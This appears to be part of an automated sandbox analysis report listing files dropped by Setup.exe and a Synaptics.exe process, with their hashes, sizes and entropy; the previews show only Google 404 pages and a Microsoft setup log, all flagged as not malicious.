                                                                                            SHA-512:D5455863FCD356E7EFBCAE471F5A7669E9C59A05159714E99B206346E7833E9A87A2E339FD3DF0C239907764B578FC6EF0E76194803271BECE1D0BCC4DE27562
                                                                                            Malicious:false
                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="crW3LagFIOn8EugZu4ei1g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                            C:\Users\user\AppData\Local\Temp\Microsoft Visual C++ 2010 x64 Redistributable Setup_20250102_142937283.html (copy)

                                                                                            Download File
                                                                                            Process:C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exe
                                                                                            File Type:HTML document, Unicode text, UTF-16, little-endian text, with very long lines (322), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):29384
                                                                                            Entropy (8bit):3.7121023497225725
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:7Ddx3KOTczFQ21Kp4n5DTx1iDecPeLHLHQFJFjZWblWUxFzJzcKHjyh+4FrCakb:fdsOT01KcBUFJFEWUxFzvHelFrCakb
                                                                                            MD5:690E4BF6EADC41B22069DF97D31C7E62
                                                                                            SHA1:F2655F5EA6526AA2E7731705A82EADADCA885A21
                                                                                            SHA-256:136E682F9A96BC5CBDA8DA35983EA273648302C7B363C1C05D548E4CF6A2D3E8
                                                                                            SHA-512:EFA92C23B4440212AAB73F9BB8F6B670B29199F64190B0F2B5755C3DF219F9251126F44A710E3725A010A2A7CBA002A9929D80DA7A6CF2F890BA5CBE5F01C9B7
                                                                                            Malicious:false
                                                                                            Preview:..<.!.D.O.C.T.Y.P.E. .h.t.m.l. .P.U.B.L.I.C. .".-././.W.3.C././.D.T.D. .X.H.T.M.L. .1...1././.E.N.". .".h.t.t.p.:././.w.w.w...w.3...o.r.g./.T.R./.x.h.t.m.l.1.1./.D.T.D./.x.h.t.m.l.1.1...d.t.d.".>.....<.!.-.-. .T.h.e. .E.x.t.e.n.d.e.d. .C.o.p.y.r.i.g.h.t./.T.r.a.d.e.m.a.r.k. .L.a.n.g.u.a.g.e. .R.e.s.i.d.e.s. .A.t.:. .h.t.t.p.:././.w.w.w...m.i.c.r.o.s.o.f.t...c.o.m./.i.n.f.o./.c.p.y.r.t.I.n.f.r.g...h.t.m. .-.-.>.....<.h.t.m.l. .x.m.l.n.s.=.".h.t.t.p.:././.w.w.w...w.3...o.r.g./.1.9.9.9./.x.h.t.m.l.".>.....<.h.e.a.d.>.......<.m.e.t.a. .h.t.t.p.-.e.q.u.i.v.=.".C.o.n.t.e.n.t.-.T.y.p.e.". .c.o.n.t.e.n.t.=.".t.e.x.t./.h.t.m.l.;. .c.h.a.r.s.e.t.=.u.t.f.-.1.6."./.>.<.b.a.s.e. .t.a.r.g.e.t.=."._.b.l.a.n.k."./.>.......<.s.t.y.l.e. .t.y.p.e.=.".t.e.x.t./.c.s.s.".>.........h.t.m.l.{.o.v.e.r.f.l.o.w.:.s.c.r.o.l.l.}.........b.o.d.y.{.f.o.n.t.-.s.i.z.e.:.1.0.p.t.;.f.o.n.t.-.f.a.m.i.l.y.:.V.e.r.d.a.n.a.;.c.o.l.o.r.:.#.0.0.0.0.0.0.;.b.a.c.k.g.r.o.u.n.d.-.c.o.l.o.r.:.#.F.0.F.0.F.0.}...........h.e.a.d.e.r.

                                                                                            C:\Users\user\AppData\Local\Temp\Pm7Tsio.ini

                                                                                            Download File
                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1652
                                                                                            Entropy (8bit):5.258295429965755
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:GgsF+0Lv8SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+20+pAZewRDK4mW
                                                                                            MD5:73B2852003122B961757DEC169B0CF1B
                                                                                            SHA1:670D505423FECC6214E1DF97B240A8DED1520F19
                                                                                            SHA-256:7B5A1F74DF74451C1AE7BF5751EB842173E37A16059EB3209030BD7D0B35CA7E
                                                                                            SHA-512:96ED461AFFCBAD5071E7859CC00051300BCBC1E4E6BF1485C5CD6CE4DBF72662BC665C9A0AD436162956E9565C28C47EA523E982FDAF0CC460E3642AD4C6434D
                                                                                            Malicious:false
                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="9Tyr-dxo-cBzp6fP6TjDlA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                            C:\Users\user\AppData\Local\Temp\Setup_20250102_142929626.html

                                                                                            Download File
                                                                                            Process:C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exe
                                                                                            File Type:HTML document, Unicode text, UTF-16, little-endian text, with very long lines (322), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):29384
                                                                                            Entropy (8bit):3.7121023497225725
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:7Ddx3KOTczFQ21Kp4n5DTx1iDecPeLHLHQFJFjZWblWUxFzJzcKHjyh+4FrCakb:fdsOT01KcBUFJFEWUxFzvHelFrCakb
                                                                                            MD5:690E4BF6EADC41B22069DF97D31C7E62
                                                                                            SHA1:F2655F5EA6526AA2E7731705A82EADADCA885A21
                                                                                            SHA-256:136E682F9A96BC5CBDA8DA35983EA273648302C7B363C1C05D548E4CF6A2D3E8
                                                                                            SHA-512:EFA92C23B4440212AAB73F9BB8F6B670B29199F64190B0F2B5755C3DF219F9251126F44A710E3725A010A2A7CBA002A9929D80DA7A6CF2F890BA5CBE5F01C9B7
                                                                                            Malicious:false
                                                                                            Preview:..<.!.D.O.C.T.Y.P.E. .h.t.m.l. .P.U.B.L.I.C. .".-././.W.3.C././.D.T.D. .X.H.T.M.L. .1...1././.E.N.". .".h.t.t.p.:././.w.w.w...w.3...o.r.g./.T.R./.x.h.t.m.l.1.1./.D.T.D./.x.h.t.m.l.1.1...d.t.d.".>.....<.!.-.-. .T.h.e. .E.x.t.e.n.d.e.d. .C.o.p.y.r.i.g.h.t./.T.r.a.d.e.m.a.r.k. .L.a.n.g.u.a.g.e. .R.e.s.i.d.e.s. .A.t.:. .h.t.t.p.:././.w.w.w...m.i.c.r.o.s.o.f.t...c.o.m./.i.n.f.o./.c.p.y.r.t.I.n.f.r.g...h.t.m. .-.-.>.....<.h.t.m.l. .x.m.l.n.s.=.".h.t.t.p.:././.w.w.w...w.3...o.r.g./.1.9.9.9./.x.h.t.m.l.".>.....<.h.e.a.d.>.......<.m.e.t.a. .h.t.t.p.-.e.q.u.i.v.=.".C.o.n.t.e.n.t.-.T.y.p.e.". .c.o.n.t.e.n.t.=.".t.e.x.t./.h.t.m.l.;. .c.h.a.r.s.e.t.=.u.t.f.-.1.6."./.>.<.b.a.s.e. .t.a.r.g.e.t.=."._.b.l.a.n.k."./.>.......<.s.t.y.l.e. .t.y.p.e.=.".t.e.x.t./.c.s.s.".>.........h.t.m.l.{.o.v.e.r.f.l.o.w.:.s.c.r.o.l.l.}.........b.o.d.y.{.f.o.n.t.-.s.i.z.e.:.1.0.p.t.;.f.o.n.t.-.f.a.m.i.l.y.:.V.e.r.d.a.n.a.;.c.o.l.o.r.:.#.0.0.0.0.0.0.;.b.a.c.k.g.r.o.u.n.d.-.c.o.l.o.r.:.#.F.0.F.0.F.0.}...........h.e.a.d.e.r.

                                                                                            C:\Users\user\AppData\Local\Temp\SkryHD7.ini

                                                                                            Download File
                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1652
                                                                                            Entropy (8bit):5.271179337934484
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:GgsF+0bSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+U+pAZewRDK4mW
                                                                                            MD5:21ABF79DA5CFBDBD81BAE43B7DF9A86B
                                                                                            SHA1:061EAF7AD41A08D5C6DC16132F8BDED6DB8C637F
                                                                                            SHA-256:78F767E5DAA28F8928546372C6306E8557258490768B2140DAEB2AC2E27C5A16
                                                                                            SHA-512:37F5B4C82125E4F2C7551159B9548C532D35022F1A682519D207993F42E81D83E28438C52E4368656C19C4194D45C0E5AE9D971EA1BB8CC2A4D32EE72AFFE147
                                                                                            Malicious:false
                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="EL02tItUBBjLEDbzZs4N4Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                            C:\Users\user\AppData\Local\Temp\UR7qPsr.ini

                                                                                            Download File
                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1652
                                                                                            Entropy (8bit):5.255338591118692
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:GgsF+0sSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+j+pAZewRDK4mW
                                                                                            MD5:B98C084240A71BE6337DBDF2961018BA
                                                                                            SHA1:7781B2005F5E03CAED1219BF9BA6AA6232626F93
                                                                                            SHA-256:E309CCF57C0365DFA320E6EE0A069F2EA754C245AF0AAB197E2DB4026FEA576E
                                                                                            SHA-512:A48C581FA97FA55FE1E5736CC16DBB2721308E3EFE1523999B0F5EA8DD154F7B1D3BDFF1C1D41A90AB40E257DDC53C63FE00D541ED86D56A7383D37900A829C6
                                                                                            Malicious:false
                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Hbzez5fzU6etV0XQnpNvcg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                            C:\Users\user\AppData\Local\Temp\Uv5zwNs.ini

                                                                                            Download File
                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1652
                                                                                            Entropy (8bit):5.2651283976115355
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:GgsF+0BdkSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK++dk+pAZewRDK4mW
                                                                                            MD5:B325BCD25D049056AD0EDF5148FE731B
                                                                                            SHA1:02449254FADDD2D02612AB45B4D6A443BD0DE7E3
                                                                                            SHA-256:97B636532532DD29CECC5E9038C30690E1E86F8FF23A4BE9C4E408E41F04776F
                                                                                            SHA-512:C45CB8E6C029FB6AEBB6C681CC3F73E873F4DCA2D5D6179135956D1DCC77E0C5A5F9653A71CFB31D59C129F8826CA16693B0D9B787C800B6A6683C3C509B9E9A
                                                                                            Malicious:false
                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="6TOH9EHPlNP0MgaCgoUCcw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                            C:\Users\user\AppData\Local\Temp\VXIImEL.ini

                                                                                            Download File
                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1652
                                                                                            Entropy (8bit):5.264690092783497
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:GgsF+089SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+/+pAZewRDK4mW
                                                                                            MD5:537A29C41225CC53437EFE2ED66398A6
                                                                                            SHA1:EDD4FCF2458C94F132056FFEFEAD14264D1DCA78
                                                                                            SHA-256:BA2AF12CDEBAF3FBFF8A48912410134F41BD524556B8EDE8945370696FCC4F68
                                                                                            SHA-512:8191DC71679CC3FBC8604B5AD256A88FDFAF6F363397036116C8848BCE12BC0046419040F1C91319D2FD00821637CC199145EF2237305A8BB90143978F9945AC
                                                                                            Malicious:false
                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="F_DdKjanoJGjTE-0FVmgMA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                            C:\Users\user\AppData\Local\Temp\XlOtT5I.ini

                                                                                            Download File
                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1652
                                                                                            Entropy (8bit):5.2669746009996965
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:GgsF+0ywSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+tw+pAZewRDK4mW
                                                                                            MD5:EA03BE47D379D3B5C1E3F645FF014B69
                                                                                            SHA1:A9821301EB1FD90E24DAE9AF5EC5782F79620C5B
                                                                                            SHA-256:49E4BC7F359BA9C5A06CFF6C39B026053C1A30DFCFE7D1E30CE72514D5C361E1
                                                                                            SHA-512:1E5031680511C0DBAD69D0206A6B56E3D021A1EA4169994E59FA7CBB00CE2FE1BCAAC6860B626E21A2C9CBCE5106ABD9645CE883642D3C1A6682D26A5938CE08
                                                                                            Malicious:false
                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="v57-PstQ3yfPnJ6IKAfEPg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                            C:\Users\user\AppData\Local\Temp\XybzZcD.ini

                                                                                            Download File
                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1652
                                                                                            Entropy (8bit):5.254442290959029
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:GgsF+0VSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+++pAZewRDK4mW
                                                                                            MD5:FB46B669B4F8FF3C4776965A5CFA59A8
                                                                                            SHA1:F7F03962519F0C8A2FE420689F72E5DCBCB8A4E8
                                                                                            SHA-256:A57069AEAB49B0AC3A0B1AFBA7E8D698EA5D2BBEA33116EC287FEA09E62AD53A
                                                                                            SHA-512:D0ED014EF390991DA5F26692A44573B9E4EDBD7F3AE303D2D887322750689A64BEE8CFCE5BF4666E22C8626197A172011B63E45BE79922B23F50BE6A6EAEB9DF
                                                                                            Malicious:false
                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="pQDX5-2-dp_Fk1VgVbtGxA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                            C:\Users\user\AppData\Local\Temp\dU7ZdIR.ini

                                                                                            Download File
                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1652
                                                                                            Entropy (8bit):5.255438798505019
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:GgsF+0e4SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+k+pAZewRDK4mW
                                                                                            MD5:8012FD49FC7714735F11EDD7360C56EF
                                                                                            SHA1:635312D5095148B9579C1FB6CEBCA18EEFDC0176
                                                                                            SHA-256:E50A7541864D6B34AE9FD399877FBAA59050C02051B7A12F32C961FC0C927AFD
                                                                                            SHA-512:F3E548824E0A54D59ED0965792D5354CE1B868904513DDBEE52B415788F408C719D88678D5DF5248E70E8A09B9F84303B88A1E03A77F595038E2600A459386E5
                                                                                            Malicious:false
                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="NEPg8zrwx1spXaZJeZNu3w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                            C:\Users\user\AppData\Local\Temp\euBl9US.ini

                                                                                            Download File
                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1652
                                                                                            Entropy (8bit):5.246916367870839
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:GgsF+0d5xSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+c5x+pAZewRDK4mW
                                                                                            MD5:F986CCB98EC7E6CFAB59820F539B9619
                                                                                            SHA1:ECA2BADCC1885482CAD1E3AE059CEF65EFFAB2E3
                                                                                            SHA-256:2F5C86C06CE8F49C34F585D4EB12DBF061DF8CC712B4A487AFE153D533819FF9
                                                                                            SHA-512:01D5683A3CC8EEC2491442FB7D9B4729554044B7E426B997E9D9E5781CEBD8262773795CF416AD3DB30325CFCAB22DBF85BA244387E5F5275BEE987A1A1B5268
                                                                                            Malicious:false
                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="rMggo3Tc2RokpMjfqH4d1g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                            C:\Users\user\AppData\Local\Temp\f9mTqjw.ini

                                                                                            Download File
                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1652
                                                                                            Entropy (8bit):5.273974109035691
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:GgsF+00SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+f+pAZewRDK4mW
                                                                                            MD5:239B40444E493B0047ECDBD741854090
                                                                                            SHA1:0133BBD814BD42B5AE8C509A7DB3B1D9274229B7
                                                                                            SHA-256:D8E6F94C1063699E4DEE03D59C4FFC92646986190ACE6604E7431066EC0EF2D1
                                                                                            SHA-512:A758DAA6C8626E8D841DF076D5917117B102E7757673FE558259D13E83E3D85FEBD9136AB0E20118107EEDC235D588A7CF75E047E512D12EA6F29058895564A6
                                                                                            Malicious:false
                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="H2llTVP-OOz760yZJiPRBQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                            C:\Users\user\AppData\Local\Temp\ffFBTtl.ini

                                                                                            Download File
                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1652
                                                                                            Entropy (8bit):5.26090581278965
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:GgsF+0QISU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+dI+pAZewRDK4mW
                                                                                            MD5:D84B4AD4171E7E4091ACC2D4DAF14F2D
                                                                                            SHA1:310B0EC98EC6CB57762C1CCA6E592858D0002B39
                                                                                            SHA-256:D237D2C2C8CEF782EA8CB857139D4BBC01A99CFB0F1D9C6C5E5DBDD52DA42830
                                                                                            SHA-512:B4F393C679A2BCE5D1369673E4D53A349D6975E2904353C5A449167BA3115AC3B521EBEFD2CB9B355765C25C91B7E561E15335B16640170A80A15191FA788A24
                                                                                            Malicious:false
                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="E7nB705iiYEP7jdJSrmBpQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                            C:\Users\user\AppData\Local\Temp\iYV9bRC.ini

                                                                                            Download File
                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1652
                                                                                            Entropy (8bit):5.256461469503897
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:GgsF+09xQe3SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Kb3+pAZewRDK4mW
                                                                                            MD5:01B8B61D1EF56F8F0C1C1413101F0368
                                                                                            SHA1:90F46978EBCBB265939A00CBDD83E7BEBAD32B10
                                                                                            SHA-256:6F8A2262FD34FB14CA920CE71C80C7113B2AAB5A89FA9347799D343AA0774EA5
                                                                                            SHA-512:23AE88715324B7FCB81BD901A60891C4494E1C84A9D4E75EBDB9597FEA331CC25D020A31256F756504F83DD5C88E6797B561C5F3BD158870F44FE2A635FEBEE8
                                                                                            Malicious:false
